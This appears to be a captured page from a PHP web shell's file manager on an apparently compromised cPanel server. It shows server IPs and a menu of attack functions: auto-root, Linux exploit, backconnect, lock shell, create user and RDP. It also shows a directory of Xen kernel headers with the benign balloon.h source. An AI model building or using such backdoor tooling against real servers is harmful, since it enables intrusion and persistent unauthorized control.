Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.6.50
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-25 /
include /
xen /
[ HOME SHELL ]
Name
Size
Permission
Action
arm
[ DIR ]
drwxr-xr-x
interface
[ DIR ]
drwxr-xr-x
acpi.h
2.52
KB
-rw-r--r--
balloon.h
1.02
KB
-rw-r--r--
events.h
4.72
KB
-rw-r--r--
features.h
502
B
-rw-r--r--
grant_table.h
11.33
KB
-rw-r--r--
hvc-console.h
518
B
-rw-r--r--
hvm.h
1.33
KB
-rw-r--r--
mem-reservation.h
1.49
KB
-rw-r--r--
page.h
1.29
KB
-rw-r--r--
platform_pci.h
2.04
KB
-rw-r--r--
swiotlb-xen.h
553
B
-rw-r--r--
xen-front-pgdir-shbuf.h
2.31
KB
-rw-r--r--
xen-ops.h
6.59
KB
-rw-r--r--
xen.h
1.63
KB
-rw-r--r--
xenbus.h
8.62
KB
-rw-r--r--
xenbus_dev.h
1.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : balloon.h
/* SPDX-License-Identifier: GPL-2.0 */ /****************************************************************************** * Xen balloon functionality */ #ifndef _XEN_BALLOON_H #define _XEN_BALLOON_H #define RETRY_UNLIMITED 0 struct balloon_stats { /* We aim for 'current allocation' == 'target allocation'. */ unsigned long current_pages; unsigned long target_pages; unsigned long target_unpopulated; /* Number of pages in high- and low-memory balloons. */ unsigned long balloon_low; unsigned long balloon_high; unsigned long total_pages; unsigned long schedule_delay; unsigned long max_schedule_delay; unsigned long retry_count; unsigned long max_retry_count; }; extern struct balloon_stats balloon_stats; void balloon_set_new_target(unsigned long target); int alloc_xenballooned_pages(int nr_pages, struct page **pages); void free_xenballooned_pages(int nr_pages, struct page **pages); #ifdef CONFIG_XEN_BALLOON void xen_balloon_init(void); #else static inline void xen_balloon_init(void) { } #endif #endif /* _XEN_BALLOON_H */
Close